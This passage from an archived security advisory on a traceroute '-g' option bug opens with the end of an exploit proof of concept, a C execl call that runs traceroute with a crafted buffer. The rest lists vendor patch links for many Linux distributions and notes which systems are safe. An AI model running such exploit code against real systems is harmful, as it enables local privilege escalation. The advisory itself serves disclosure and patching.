	    execl(prog,prog,prog,"-g",buf,"-g 1","127.0.0.1", NULL);

	    return 0;
    }

Solution

    Safe are: LBNL 1.4a7 and  RedHat7.0 traceroute (1.4a5 + a  patch).
    RedHat-7.0 includes a patch to get a raw socket then drop privs at
    startup.   Hopefully this  will be  hoovered up  into the upstream
    traceroute source  tarball. It  does not  appear to  be in version
    1.4a7.

    For Caldera Linux:

        ftp://ftp.calderasystems.com/pub/updates/OpenLinux/2.3/current/RPMS/traceroute-1.4a5-9.i386.rpm
        ftp://ftp.calderasystems.com/pub/updates/OpenLinux/2.3/current/SRPMS/traceroute-1.4a5-9.src.rpm
        ftp://ftp.calderasystems.com/pub/updates/eServer/2.3/current/RPMS/traceroute-1.4a5-9.i386.rpm
        ftp://ftp.calderasystems.com/pub/updates/eServer/2.3/current/SRPMS/traceroute-1.4a5-9.src.rpm
        ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4/current/RPMS/traceroute-1.4a5-9.i386.rpm
        ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4/current/SRPMS/traceroute-1.4a5-9.src.rpm

    For Conectiva Linux:

        ftp://atualizacoes.conectiva.com.br/4.0/SRPMS/traceroute-1.4a7-2cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/4.0/i386/traceroute-1.4a7-2cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0es/SRPMS/traceroute-1.4a7-2cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/4.0es/i386/traceroute-1.4a7-2cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/SRPMS/traceroute-1.4a7-2cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/traceroute-1.4a7-2cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/SRPMS/traceroute-1.4a7-2cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/traceroute-1.4a7-2cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/traceroute-1.4a7-2cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/traceroute-1.4a7-2cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/traceroute-1.4a7-2cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/i386/traceroute-1.4a7-2cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/SRPMS/traceroute-1.4a7-2cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/traceroute-1.4a7-2cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/SRPMS/traceroute-1.4a7-2cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/traceroute-1.4a7-2cl.i386.rpm

    For Linux-Mandrake:

        Linux-Mandrake 6.0: 6.0/RPMS/traceroute-1.4a5-12mdk.i586.rpm
                            6.0/SRPMS/traceroute-1.4a5-12mdk.src.rpm
        Linux-Mandrake 6.1: 6.1/RPMS/traceroute-1.4a5-12mdk.i586.rpm
                            6.1/SRPMS/traceroute-1.4a5-12mdk.src.rpm
        Linux-Mandrake 7.0: 7.0/RPMS/traceroute-1.4a5-12mdk.i586.rpm
                            7.0/SRPMS/traceroute-1.4a5-12mdk.src.rpm
        Linux-Mandrake 7.1: 7.1/RPMS/traceroute-1.4a5-12mdk.i586.rpm
                            7.1/SRPMS/traceroute-1.4a5-12mdk.src.rpm

    For RedHat:

        ftp://updates.redhat.com/5.2/alpha/traceroute-1.4a5-24.5x.alpha.rpm
        ftp://updates.redhat.com/5.2/sparc/traceroute-1.4a5-24.5x.sparc.rpm
        ftp://updates.redhat.com/5.2/i386/traceroute-1.4a5-24.5x.i386.rpm
        ftp://updates.redhat.com/5.2/SRPMS/traceroute-1.4a5-24.5x.src.rpm
        ftp://updates.redhat.com/6.2/alpha/traceroute-1.4a5-24.6x.alpha.rpm
        ftp://updates.redhat.com/6.2/sparc/traceroute-1.4a5-24.6x.sparc.rpm
        ftp://updates.redhat.com/6.2/i386/traceroute-1.4a5-24.6x.i386.rpm
        ftp://updates.redhat.com/6.2/SRPMS/traceroute-1.4a5-24.6x.src.rpm

    For Debian:

        http://security.debian.org/dists/potato/updates/main/source/traceroute_1.4a5-3.diff.gz
        http://security.debian.org/dists/potato/updates/main/source/traceroute_1.4a5-3.dsc
        http://security.debian.org/dists/potato/updates/main/source/traceroute_1.4a5.orig.tar.gz
        http://security.debian.org/dists/potato/updates/main/binary-alpha/traceroute_1.4a5-3_alpha.deb
        http://security.debian.org/dists/potato/updates/main/binary-arm/traceroute_1.4a5-3_arm.deb
        http://security.debian.org/dists/potato/updates/main/binary-i386/traceroute_1.4a5-3_i386.deb
        http://security.debian.org/dists/potato/updates/main/binary-m68k/traceroute_1.4a5-3_m68k.deb
        http://security.debian.org/dists/potato/updates/main/binary-powerpc/traceroute_1.4a5-3_powerpc.deb
        http://security.debian.org/dists/potato/updates/main/binary-sparc/traceroute_1.4a5-3_sparc.deb

    For SuSE Linux:

        SuSE-7.0: ftp://ftp.suse.com/pub/suse/i386/update/7.0/a1/nkitb-2000.10.4-0.i386.rpm
                  ftp://ftp.suse.com/pub/suse/i386/update/7.0/zq1/nkitb-2000.10.4-0.src.rpm
                  ftp://ftp.suse.com/pub/suse/sparc/update/7.0/a1/nkitb-2000.10.4-0.sparc.rpm
                  ftp://ftp.suse.com/pub/suse/sparc/update/7.0/zq1/nkitb-2000.10.4-0.src.rpm
                  ftp://ftp.suse.com/pub/suse/ppc/update/7.0/a1/nkitb-2000.10.5-0.ppc.rpm
                  ftp://ftp.suse.com/pub/suse/ppc/update/7.0/zq1/nkitb-2000.10.5-0.src.rpm

        SuSE-6.4: ftp://ftp.suse.com/pub/suse/i386/update/6.4/a1/nkitb-2000.10.4-0.i386.rpm
                  ftp://ftp.suse.com/pub/suse/i386/update/6.4/zq1/nkitb-2000.10.4-0.src.rpm
                  ftp://ftp.suse.com/pub/suse/axp/update/6.4/a1/nkitb-2000.10.4-0.alpha.rpm
                  ftp://ftp.suse.com/pub/suse/axp/update/6.4/zq1/nkitb-2000.10.4-0.src.rpm
                  ftp://ftp.suse.com/pub/suse/ppc/update/6.4/a1/nkitb-2000.10.4-0.ppc.rpm
                  ftp://ftp.suse.com/pub/suse/ppc/update/6.4/zq1/nkitb-2000.10.4-0.src.rpm

        SuSE-6.3: ftp://ftp.suse.com/pub/suse/i386/update/6.3/n1/nkita-2000.10.4-0.i386.rpm
                  ftp://ftp.suse.com/pub/suse/i386/update/6.3/zq1/nkita-2000.10.4-0.src.rpm
                  ftp://ftp.suse.com/pub/suse/axp/update/6.3/n1/nkita-2000.10.4-0.alpha.rpm
                  ftp://ftp.suse.com/pub/suse/axp/update/6.3/zq1/nkita-2000.10.4-0.src.rpm

        SuSE-6.2: ftp://ftp.suse.com/pub/suse/i386/update/6.2/n1/nkita-2000.10.4-0.i386.rpm
                  ftp://ftp.suse.com/pub/suse/i386/update/6.2/zq1/nkita-2000.10.4-0.src.rpm

        SuSE-6.1: ftp://ftp.suse.com/pub/suse/i386/update/6.1/n1/nkita-2000.10.4-0.i386.rpm
                  ftp://ftp.suse.com/pub/suse/i386/update/6.1/zq1/nkita-2000.10.4-0.src.rpm

        SuSE-6.0: Please use the update packages from the 6.1 distribution.

    For ImmunixOS:

        http://www.immunix.org:8080/ImmunixOS/6.2/updates/RPMS/traceroute-1.4a5-24.6x_StackGuard.i386.rpm
        http://www.immunix.org:8080/ImmunixOS/6.2/updates/SRPMS/traceroute-1.4a5-24.6x_StackGuard.src.rpm

    For TurboLinux:

        ftp://ftp.turbolinux.com/pub/updates/6.0/traceroute-1.4a7-2.i386.rpm
        ftp://ftp.turbolinux.com/pub/updates/6.0/SRPMS/traceroute-1.4a7-2.src.rpm

    Even though Solaris 7 and later include LBNL traceroute, the first
    version  of  the  source  checked  into  SCCS  has  the  following
    interesting comment (this branch dates from 98/01/12):

                /*
                 * LBNL bug fixed: used to call savestr(), which was buggy
                 * it gives bus error when more than one -g used
                 * savestr.h removed
                 */

    The code was completely  removed when IPv6 support  was integrated
    much later.

    FreeBSD, SuSE, HpUX, OpenBSD, Slackware are safe.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH